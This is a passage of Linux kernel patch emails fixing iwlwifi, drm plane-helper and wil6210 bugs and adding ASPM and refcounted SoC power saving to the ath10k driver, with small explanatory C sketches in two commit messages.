f8ec6748 [21795.374228] 000003dd f8eb982e f8eb982e 00000000 c3408ed4 c41edbbc e51f3d20 c103a862 [21795.377006] 00000009 00000000 e51f3da8 f8eb982e c41ee3dc 00000004 e7970000 e51f3d74 [21795.379792] Call Trace: [21795.382461] [] dump_stack+0x16/0x18 [21795.385133] [] warn_slowpath_common+0x64/0x80 [21795.387803] [] ? __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm] [21795.390485] [] ? __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm] [21795.393124] [] warn_slowpath_null+0x22/0x30 [21795.395787] [] __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm] [21795.398464] [] iwl_mvm_suspend+0xec/0x140 [iwlmvm] [21795.401127] [] ? 
del_timer_sync+0xa1/0xc0 [21795.403800] [] __ieee80211_suspend+0x1de/0xff0 [mac80211] [21795.406459] [] ? mutex_lock_nested+0x25d/0x350 [21795.409084] [] ? rtnl_lock+0x14/0x20 [21795.411685] [] ieee80211_suspend+0x16/0x20 [mac80211] [21795.414318] [] wiphy_suspend+0x74/0x710 [cfg80211] [21795.416916] [] __device_suspend+0x1e2/0x220 [21795.419521] [] ? addresses_show+0xa0/0xa0 [cfg80211] [21795.422097] [] dpm_suspend+0x67/0x210 [21795.424661] [] dpm_suspend_start+0x4f/0x60 [21795.427219] [] suspend_devices_and_enter+0x60/0x480 [21795.429768] [] ? printk+0x4d/0x4f [21795.432295] [] pm_suspend+0x176/0x210 [21795.434830] [] state_store+0x5d/0xb0 [21795.437410] [] ? wakeup_count_show+0x50/0x50 [21795.439961] [] kobj_attr_store+0x1b/0x30 [21795.442514] [] sysfs_write_file+0xab/0x100 [21795.445088] [] ? sysfs_poll+0xa0/0xa0 [21795.447659] [] vfs_write+0xa5/0x1c0 [21795.450212] [] SyS_write+0x57/0xa0 [21795.452699] [] sysenter_do_call+0x12/0x32 [21795.455146] ---[ end trace faf5321baba2bfdb ]--- To fix this, call the iwl_mvm_free_nd() function in case of any error during resume. Additionally, rename the "out_unlock" label to err to make it clearer that it's only called in error conditions. Cc: stable@vger.kernel.org [3.19+] Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 91ca8df007f7..4310cf102d78 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1870,15 +1870,15 @@ static int __iwl_mvm_resume(struct iwl_mvm *mvm, bool test) /* get the BSS vif pointer again */ vif = iwl_mvm_get_bss_vif(mvm); if (IS_ERR_OR_NULL(vif)) - goto out_unlock; + goto err; ret = iwl_trans_d3_resume(mvm->trans, &d3_status, test); if (ret) - goto out_unlock; + goto err; if (d3_status != IWL_D3_STATUS_ALIVE) { IWL_INFO(mvm, "Device was reset during suspend\n"); - goto out_unlock; + goto err; } /* query SRAM first in case we want event logging */ @@ -1904,7 +1904,8 @@ static int __iwl_mvm_resume(struct iwl_mvm *mvm, bool test) goto out_iterate; } - out_unlock: +err: + iwl_mvm_free_nd(mvm); mutex_unlock(&mvm->mutex); out_iterate: From 292208914d8ca5a41cf68c2f1d2810a2ea2044e9 Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Tue, 14 Apr 2015 11:36:23 +0300 Subject: [PATCH 155/872] iwlwifi: mvm: avoid use-after-free on iwl_mvm_d0i3_enable_tx() qos_seq points (to a struct) inside the command response data. Make sure to free the response only after qos_seq is not needed anymore. 
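The bug class is ordinary pointer aliasing; a self-contained, driver-independent illustration (all names hypothetical) is:

#include <stdio.h>
#include <stdlib.h>

struct response {
	unsigned reasons;
	unsigned short qos_seq[4];
};

int main(void)
{
	struct response *resp = calloc(1, sizeof(*resp));
	unsigned short *qos_seq;

	if (!resp)
		return 1;

	qos_seq = resp->qos_seq;	/* points inside resp */
	printf("qos_seq[0] = %u\n", (unsigned)qos_seq[0]);	/* every use of qos_seq ... */

	free(resp);	/* ... must happen before the owning buffer is released */
	return 0;
}

Freeing the response before the last read through the aliasing pointer is exactly the ordering the patch below corrects.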
Reported-by: Heng Luo Signed-off-by: Eliad Peller Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/ops.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 1c66297d82c0..2ea01238754e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -1263,11 +1263,13 @@ static void iwl_mvm_d0i3_exit_work(struct work_struct *wk) ieee80211_iterate_active_interfaces( mvm->hw, IEEE80211_IFACE_ITER_NORMAL, iwl_mvm_d0i3_disconnect_iter, mvm); - - iwl_free_resp(&get_status_cmd); out: iwl_mvm_d0i3_enable_tx(mvm, qos_seq); + /* qos_seq might point inside resp_pkt, so free it only now */ + if (get_status_cmd.resp_pkt) + iwl_free_resp(&get_status_cmd); + /* the FW might have updated the regdomain */ iwl_mvm_update_changed_regdom(mvm); From 2e7f43c41c042d6fed4d67aceeaae32d8f102e98 Mon Sep 17 00:00:00 2001 From: Daniel Vetter Date: Wed, 20 May 2015 10:36:32 +0200 Subject: [PATCH 156/872] drm/plane-helper: Adapt cursor hack to transitional helpers In commit f02ad907cd9e7fe3a6405d2d005840912f1ed258 Author: Daniel Vetter Date: Thu Jan 22 16:36:23 2015 +0100 drm/atomic-helpers: Recover full cursor plane behaviour we've added a hack to atomic helpers to never to vblank waits for cursor updates through the legacy apis since that's what X expects. Unfortunately we've (again) forgotten to adjust the transitional helpers. Do this now. This fixes regressions for drivers only partially converted over to atomic (like i915). Reported-by: Pekka Paalanen Cc: Pekka Paalanen Cc: stable@vger.kernel.org Signed-off-by: Daniel Vetter Reviewed-and-tested-by: Mario Kleiner Signed-off-by: Jani Nikula --- drivers/gpu/drm/drm_plane_helper.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/gpu/drm/drm_plane_helper.c b/drivers/gpu/drm/drm_plane_helper.c index 40c1db9ad7c3..2f0ed11024eb 100644 --- a/drivers/gpu/drm/drm_plane_helper.c +++ b/drivers/gpu/drm/drm_plane_helper.c @@ -465,6 +465,9 @@ int drm_plane_helper_commit(struct drm_plane *plane, if (!crtc[i]) continue; + if (crtc[i]->cursor == plane) + continue; + /* There's no other way to figure out whether the crtc is running. */ ret = drm_crtc_vblank_get(crtc[i]); if (ret == 0) { From 80714b09bc574c5b23e50264e76e6e0f78d23549 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 11 May 2015 19:10:48 +0300 Subject: [PATCH 157/872] wil6210: fix format specifier for dma_addr_t Fix format specifier used for dma_addr_t, namely use %pad Debug print virtual address for the same buffer as well. Fixes: dc16427bbe65 ("wil6210: Add pmc debug mechanism memory management") Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/pmc.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/pmc.c b/drivers/net/wireless/ath/wil6210/pmc.c index 3cb4f35ebd05..8a8cdc61b25b 100644 --- a/drivers/net/wireless/ath/wil6210/pmc.c +++ b/drivers/net/wireless/ath/wil6210/pmc.c @@ -92,9 +92,9 @@ void wil_pmc_alloc(struct wil6210_priv *wil, GFP_KERNEL); wil_dbg_misc(wil, - "%s: allocated pring %p. %zd x %d = total %zd bytes\n", + "%s: allocated pring %p => %pad. 
%zd x %d = total %zd bytes\n", __func__, - (void *)pmc->pring_pa, + pmc->pring_va, &pmc->pring_pa, sizeof(struct vring_tx_desc), num_descriptors, sizeof(struct vring_tx_desc) * num_descriptors); From 76d870ed09ab34154454b1adb823ae75f173c2d2 Mon Sep 17 00:00:00 2001 From: Janusz Dziedzic Date: Mon, 18 May 2015 09:38:16 +0000 Subject: [PATCH 158/872] ath10k: enable ASPM It is actually safe to enable ASPM after the device is booted up. This reduces power drain of QCA61X4 when driver is simply loaded (no interface is up) from 31mA to 14mA. QCA988X wasn't measured but doesn't seem to regress in any other way. Signed-off-by: Janusz Dziedzic Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/pci.c | 15 ++++++++++----- drivers/net/wireless/ath/ath10k/pci.h | 6 ++++++ 2 files changed, 16 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c index 969a1231800e..8be07c653b2d 100644 --- a/drivers/net/wireless/ath/ath10k/pci.c +++ b/drivers/net/wireless/ath/ath10k/pci.c @@ -1227,11 +1227,15 @@ static void ath10k_pci_irq_enable(struct ath10k *ar) static int ath10k_pci_hif_start(struct ath10k *ar) { + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif start\n"); ath10k_pci_irq_enable(ar); ath10k_pci_rx_post(ar); + pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, + ar_pci->link_ctl); + return 0; } @@ -1981,6 +1985,7 @@ static int ath10k_pci_chip_reset(struct ath10k *ar) static int ath10k_pci_hif_power_up(struct ath10k *ar) { + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power up\n"); @@ -1991,6 +1996,11 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar) return ret; } + pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL, + &ar_pci->link_ctl); + pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, + ar_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC); + /* * Bring the target up cleanly. * @@ -2502,7 +2512,6 @@ static int ath10k_pci_claim(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; - u32 lcr_val; int ret; pci_set_drvdata(pdev, ar); @@ -2536,10 +2545,6 @@ static int ath10k_pci_claim(struct ath10k *ar) pci_set_master(pdev); - /* Workaround: Disable ASPM */ - pci_read_config_dword(pdev, 0x80, &lcr_val); - pci_write_config_dword(pdev, 0x80, (lcr_val & 0xffffff00)); - /* Arrange for access to Target SoC registers. */ ar_pci->mem = pci_iomap(pdev, BAR_NUM, 0); if (!ar_pci->mem) { diff --git a/drivers/net/wireless/ath/ath10k/pci.h b/drivers/net/wireless/ath/ath10k/pci.h index bddf54320160..ee2173d61257 100644 --- a/drivers/net/wireless/ath/ath10k/pci.h +++ b/drivers/net/wireless/ath/ath10k/pci.h @@ -185,6 +185,12 @@ struct ath10k_pci { /* Map CE id to ce_state */ struct ath10k_ce_pipe ce_states[CE_COUNT_MAX]; struct timer_list rx_post_retry; + + /* Due to HW quirks it is recommended to disable ASPM during device + * bootup. To do that the original PCI-E Link Control is stored before + * device bootup is executed and re-programmed later. + */ + u16 link_ctl; }; static inline struct ath10k_pci *ath10k_pci_priv(struct ath10k *ar) From 917826be9f46b13604fdfc9954dd9ce69dea93f3 Mon Sep 17 00:00:00 2001 From: Janusz Dziedzic Date: Mon, 18 May 2015 09:38:17 +0000 Subject: [PATCH 159/872] ath10k: fix idle power consumption mac80211 can update vif powersave state while disconnected. 
Firmware doesn't behave nicely and consumes more power than necessary if PS is disabled on a non-started vdev. Hence force-enable PS for non-running vdevs. This reduces power drain on QCA61X4 from 88mA to 36mA when interface is up and not associated. QCA988X wasn't measured. Signed-off-by: Janusz Dziedzic Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/mac.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/ath10k/mac.c b/drivers/net/wireless/ath/ath10k/mac.c index eaa0182e001d..2cc0cbadd379 100644 --- a/drivers/net/wireless/ath/ath10k/mac.c +++ b/drivers/net/wireless/ath/ath10k/mac.c @@ -1738,7 +1738,14 @@ static int ath10k_mac_vif_setup_ps(struct ath10k_vif *arvif) enable_ps = false; } - if (enable_ps) { + if (!arvif->is_started) { + /* mac80211 can update vif powersave state while disconnected. + * Firmware doesn't behave nicely and consumes more power than + * necessary if PS is disabled on a non-started vdev. Hence + * force-enable PS for non-running vdevs. + */ + psmode = WMI_STA_PS_MODE_ENABLED; + } else if (enable_ps) { psmode = WMI_STA_PS_MODE_ENABLED; param = WMI_STA_PS_PARAM_INACTIVITY_TIME; From 77258d409ce45890104e3da11d0261402c49aee1 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Mon, 18 May 2015 09:38:18 +0000 Subject: [PATCH 160/872] ath10k: enable pci soc powersaving By using SOC_WAKE register it is possible to bring down power consumption of QCA61X4 from 36mA to 16mA when associated and idle. Currently the sleep threshold/grace period is at a very conservative value of 60ms. Contrary to QCA61X4 the QCA988X firmware doesn't have Rx/beacon filtering available for client mode and SWBA events are used for beaconing in AP/IBSS so the SoC needs to be woken up at least every ~100ms in most cases. This means that QCA988X is at a disadvantage and the power consumption won't drop as much as for QCA61X4. Due to putting irq-safe spinlocks on every MMIO read/write it is expected this can cause a little performance regression on some systems. I haven't done any thorough measurements but some of my tests don't show any extreme degradation. The patch removes some explicit pci_wake calls that were added in 320e14b8db51aa ("ath10k: fix some pci wake/sleep issues"). This is safe because all MMIO accesses are now wrapped and the device is woken up automatically if necessary. 
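The mechanism added below is easier to follow from a stripped-down sketch first. All names in it are hypothetical (ps_ctx, ps_get, ps_put, ps_timer_fn, hw_wake, hw_sleep); the real driver additionally caches the awake state, handles wake-up timeouts and uses the 60 ms grace period mentioned above. The idea: each register access holds a wake reference, dropping the last reference only arms a timer, and the timer callback is the sole place that lets the SoC sleep, provided no new reference appeared in the meantime.

#include <linux/spinlock.h>
#include <linux/timer.h>
#include <linux/jiffies.h>

struct ps_ctx {
	spinlock_t lock;
	unsigned long refcount;
	struct timer_list timer;
};

static void hw_wake(void)  { /* hypothetical stub: assert SOC_WAKE */ }
static void hw_sleep(void) { /* hypothetical stub: clear SOC_WAKE */ }

static void ps_get(struct ps_ctx *ps)		/* before an MMIO access */
{
	unsigned long flags;

	spin_lock_irqsave(&ps->lock, flags);
	if (ps->refcount++ == 0)
		hw_wake();
	spin_unlock_irqrestore(&ps->lock, flags);
}

static void ps_put(struct ps_ctx *ps)		/* after the access */
{
	unsigned long flags;

	spin_lock_irqsave(&ps->lock, flags);
	if (--ps->refcount == 0)		/* do not sleep right away ... */
		mod_timer(&ps->timer, jiffies + msecs_to_jiffies(60));
	spin_unlock_irqrestore(&ps->lock, flags);
}

static void ps_timer_fn(unsigned long data)	/* ... let the timer decide */
{
	struct ps_ctx *ps = (struct ps_ctx *)data;
	unsigned long flags;

	spin_lock_irqsave(&ps->lock, flags);
	if (ps->refcount == 0)
		hw_sleep();
	spin_unlock_irqrestore(&ps->lock, flags);
}

Keeping the sleep decision in the timer trades a little extra awake time for not toggling SOC_WAKE around every single register access.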
Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/debug.h | 1 + drivers/net/wireless/ath/ath10k/pci.c | 304 +++++++++++++++++------- drivers/net/wireless/ath/ath10k/pci.h | 89 ++++--- 3 files changed, 260 insertions(+), 134 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/debug.h b/drivers/net/wireless/ath/ath10k/debug.h index a12b8323f9f1..53bd6a19eab6 100644 --- a/drivers/net/wireless/ath/ath10k/debug.h +++ b/drivers/net/wireless/ath/ath10k/debug.h @@ -36,6 +36,7 @@ enum ath10k_debug_mask { ATH10K_DBG_REGULATORY = 0x00000800, ATH10K_DBG_TESTMODE = 0x00001000, ATH10K_DBG_WMI_PRINT = 0x00002000, + ATH10K_DBG_PCI_PS = 0x00004000, ATH10K_DBG_ANY = 0xffffffff, }; diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c index 8be07c653b2d..17a060e8efa2 100644 --- a/drivers/net/wireless/ath/ath10k/pci.c +++ b/drivers/net/wireless/ath/ath10k/pci.c @@ -330,6 +330,205 @@ static const struct service_to_pipe target_service_to_ce_map_wlan[] = { }, }; +static bool ath10k_pci_is_awake(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + u32 val = ioread32(ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + + RTC_STATE_ADDRESS); + + return RTC_STATE_V_GET(val) == RTC_STATE_V_ON; +} + +static void __ath10k_pci_wake(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + + lockdep_assert_held(&ar_pci->ps_lock); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake reg refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + iowrite32(PCIE_SOC_WAKE_V_MASK, + ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + + PCIE_SOC_WAKE_ADDRESS); +} + +static void __ath10k_pci_sleep(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + + lockdep_assert_held(&ar_pci->ps_lock); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep reg refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + iowrite32(PCIE_SOC_WAKE_RESET, + ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + + PCIE_SOC_WAKE_ADDRESS); + ar_pci->ps_awake = false; +} + +static int ath10k_pci_wake_wait(struct ath10k *ar) +{ + int tot_delay = 0; + int curr_delay = 5; + + while (tot_delay < PCIE_WAKE_TIMEOUT) { + if (ath10k_pci_is_awake(ar)) + return 0; + + udelay(curr_delay); + tot_delay += curr_delay; + + if (curr_delay < 50) + curr_delay += 5; + } + + return -ETIMEDOUT; +} + +static int ath10k_pci_wake(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + int ret = 0; + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + /* This function can be called very frequently. To avoid excessive + * CPU stalls for MMIO reads use a cache var to hold the device state. 
+ */ + if (!ar_pci->ps_awake) { + __ath10k_pci_wake(ar); + + ret = ath10k_pci_wake_wait(ar); + if (ret == 0) + ar_pci->ps_awake = true; + } + + if (ret == 0) { + ar_pci->ps_wake_refcount++; + WARN_ON(ar_pci->ps_wake_refcount == 0); + } + + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); + + return ret; +} + +static void ath10k_pci_sleep(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + if (WARN_ON(ar_pci->ps_wake_refcount == 0)) + goto skip; + + ar_pci->ps_wake_refcount--; + + mod_timer(&ar_pci->ps_timer, jiffies + + msecs_to_jiffies(ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC)); + +skip: + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); +} + +static void ath10k_pci_ps_timer(unsigned long ptr) +{ + struct ath10k *ar = (void *)ptr; + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps timer refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + if (ar_pci->ps_wake_refcount > 0) + goto skip; + + __ath10k_pci_sleep(ar); + +skip: + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); +} + +static void ath10k_pci_sleep_sync(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + + del_timer_sync(&ar_pci->ps_timer); + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + WARN_ON(ar_pci->ps_wake_refcount > 0); + __ath10k_pci_sleep(ar); + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); +} + +void ath10k_pci_write32(struct ath10k *ar, u32 offset, u32 value) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + int ret; + + ret = ath10k_pci_wake(ar); + if (ret) { + ath10k_warn(ar, "failed to wake target for write32 of 0x%08x at 0x%08x: %d\n", + value, offset, ret); + return; + } + + iowrite32(value, ar_pci->mem + offset); + ath10k_pci_sleep(ar); +} + +u32 ath10k_pci_read32(struct ath10k *ar, u32 offset) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + u32 val; + int ret; + + ret = ath10k_pci_wake(ar); + if (ret) { + ath10k_warn(ar, "failed to wake target for read32 at 0x%08x: %d\n", + offset, ret); + return 0xffffffff; + } + + val = ioread32(ar_pci->mem + offset); + ath10k_pci_sleep(ar); + + return val; +} + +u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr) +{ + return ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + addr); +} + +void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val) +{ + ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + addr, val); +} + +u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr) +{ + return ath10k_pci_read32(ar, PCIE_LOCAL_BASE_ADDRESS + addr); +} + +void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val) +{ + ath10k_pci_write32(ar, PCIE_LOCAL_BASE_ADDRESS + addr, val); +} + static bool ath10k_pci_irq_pending(struct ath10k *ar) { u32 cause; @@ -793,60 +992,6 @@ static int ath10k_pci_diag_write32(struct ath10k *ar, u32 address, u32 value) return ath10k_pci_diag_write_mem(ar, address, &val, sizeof(val)); } -static bool ath10k_pci_is_awake(struct ath10k *ar) -{ - u32 val = ath10k_pci_reg_read32(ar, RTC_STATE_ADDRESS); - - return RTC_STATE_V_GET(val) == RTC_STATE_V_ON; -} - -static int ath10k_pci_wake_wait(struct ath10k *ar) -{ - int tot_delay = 0; - int curr_delay = 5; - - while (tot_delay < PCIE_WAKE_TIMEOUT) { - if (ath10k_pci_is_awake(ar)) - return 0; - - 
udelay(curr_delay); - tot_delay += curr_delay; - - if (curr_delay < 50) - curr_delay += 5; - } - - return -ETIMEDOUT; -} - -/* The rule is host is forbidden from accessing device registers while it's - * asleep. Currently ath10k_pci_wake() and ath10k_pci_sleep() calls aren't - * balanced and the device is kept awake all the time. This is intended for a - * simpler solution for the following problems: - * - * * device can enter sleep during s2ram without the host knowing, - * - * * irq handlers access registers which is a problem if other device asserts - * a shared irq line when ath10k is between hif_power_down() and - * hif_power_up(). - * - * FIXME: If power consumption is a concern (and there are *real* gains) then a - * refcounted wake/sleep needs to be implemented. - */ - -static int ath10k_pci_wake(struct ath10k *ar) -{ - ath10k_pci_reg_write32(ar, PCIE_SOC_WAKE_ADDRESS, - PCIE_SOC_WAKE_V_MASK); - return ath10k_pci_wake_wait(ar); -} - -static void ath10k_pci_sleep(struct ath10k *ar) -{ - ath10k_pci_reg_write32(ar, PCIE_SOC_WAKE_ADDRESS, - PCIE_SOC_WAKE_RESET); -} - /* Called by lower (CE) layer when a send to Target completes. */ static void ath10k_pci_ce_send_done(struct ath10k_ce_pipe *ce_state) { @@ -1348,6 +1493,9 @@ static void ath10k_pci_flush(struct ath10k *ar) static void ath10k_pci_hif_stop(struct ath10k *ar) { + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif stop\n"); /* Most likely the device has HTT Rx ring configured. The only way to @@ -1366,6 +1514,10 @@ static void ath10k_pci_hif_stop(struct ath10k *ar) ath10k_pci_irq_disable(ar); ath10k_pci_irq_sync(ar); ath10k_pci_flush(ar); + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + WARN_ON(ar_pci->ps_wake_refcount > 0); + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static int ath10k_pci_hif_exchange_bmi_msg(struct ath10k *ar, @@ -1990,12 +2142,6 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar) ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power up\n"); - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_err(ar, "failed to wake up target: %d\n", ret); - return ret; - } - pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL, &ar_pci->link_ctl); pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, @@ -2047,7 +2193,6 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar) ath10k_pci_ce_deinit(ar); err_sleep: - ath10k_pci_sleep(ar); return ret; } @@ -2064,7 +2209,12 @@ static void ath10k_pci_hif_power_down(struct ath10k *ar) static int ath10k_pci_hif_suspend(struct ath10k *ar) { - ath10k_pci_sleep(ar); + /* The grace timer can still be counting down and ar->ps_awake be true. + * It is known that the device may be asleep after resuming regardless + * of the SoC powersave state before suspending. Hence make sure the + * device is asleep before proceeding. 
+ */ + ath10k_pci_sleep_sync(ar); return 0; } @@ -2074,13 +2224,6 @@ static int ath10k_pci_hif_resume(struct ath10k *ar) struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; u32 val; - int ret; - - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_err(ar, "failed to wake device up on resume: %d\n", ret); - return ret; - } /* Suspend/Resume resets the PCI configuration space, so we have to * re-disable the RETRY_TIMEOUT register (0x41) to keep PCI Tx retries @@ -2091,7 +2234,7 @@ static int ath10k_pci_hif_resume(struct ath10k *ar) if ((val & 0x0000ff00) != 0) pci_write_config_dword(pdev, 0x40, val & 0xffff00ff); - return ret; + return 0; } #endif @@ -2185,13 +2328,6 @@ static irqreturn_t ath10k_pci_interrupt_handler(int irq, void *arg) { struct ath10k *ar = arg; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - int ret; - - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_warn(ar, "failed to wake device up on irq: %d\n", ret); - return IRQ_NONE; - } if (ar_pci->num_msi_intrs == 0) { if (!ath10k_pci_irq_pending(ar)) @@ -2638,8 +2774,12 @@ static int ath10k_pci_probe(struct pci_dev *pdev, pdev->subsystem_vendor, pdev->subsystem_device); spin_lock_init(&ar_pci->ce_lock); + spin_lock_init(&ar_pci->ps_lock); + setup_timer(&ar_pci->rx_post_retry, ath10k_pci_rx_replenish_retry, (unsigned long)ar); + setup_timer(&ar_pci->ps_timer, ath10k_pci_ps_timer, + (unsigned long)ar); ret = ath10k_pci_claim(ar); if (ret) { @@ -2647,12 +2787,6 @@ static int ath10k_pci_probe(struct pci_dev *pdev, goto err_core_destroy; } - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_err(ar, "failed to wake up: %d\n", ret); - goto err_release; - } - ret = ath10k_pci_alloc_pipes(ar); if (ret) { ath10k_err(ar, "failed to allocate copy engine pipes: %d\n", @@ -2716,9 +2850,6 @@ static int ath10k_pci_probe(struct pci_dev *pdev, ath10k_pci_free_pipes(ar); err_sleep: - ath10k_pci_sleep(ar); - -err_release: ath10k_pci_release(ar); err_core_destroy: @@ -2748,6 +2879,7 @@ static void ath10k_pci_remove(struct pci_dev *pdev) ath10k_pci_deinit_irq(ar); ath10k_pci_ce_deinit(ar); ath10k_pci_free_pipes(ar); + ath10k_pci_sleep_sync(ar); ath10k_pci_release(ar); ath10k_core_destroy(ar); } diff --git a/drivers/net/wireless/ath/ath10k/pci.h b/drivers/net/wireless/ath/ath10k/pci.h index ee2173d61257..d7696ddc03c4 100644 --- a/drivers/net/wireless/ath/ath10k/pci.h +++ b/drivers/net/wireless/ath/ath10k/pci.h @@ -191,6 +191,35 @@ struct ath10k_pci { * device bootup is executed and re-programmed later. */ u16 link_ctl; + + /* Protects ps_awake and ps_wake_refcount */ + spinlock_t ps_lock; + + /* The device has a special powersave-oriented register. When device is + * considered asleep it drains less power and driver is forbidden from + * accessing most MMIO registers. If host were to access them without + * waking up the device might scribble over host memory or return + * 0xdeadbeef readouts. + */ + unsigned long ps_wake_refcount; + + /* Waking up takes some time (up to 2ms in some cases) so it can be bad + * for latency. To mitigate this the device isn't immediately allowed + * to sleep after all references are undone - instead there's a grace + * period after which the powersave register is updated unless some + * activity to/from device happened in the meantime. + * + * Also see comments on ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC. + */ + struct timer_list ps_timer; + + /* MMIO registers are used to communicate with the device. 
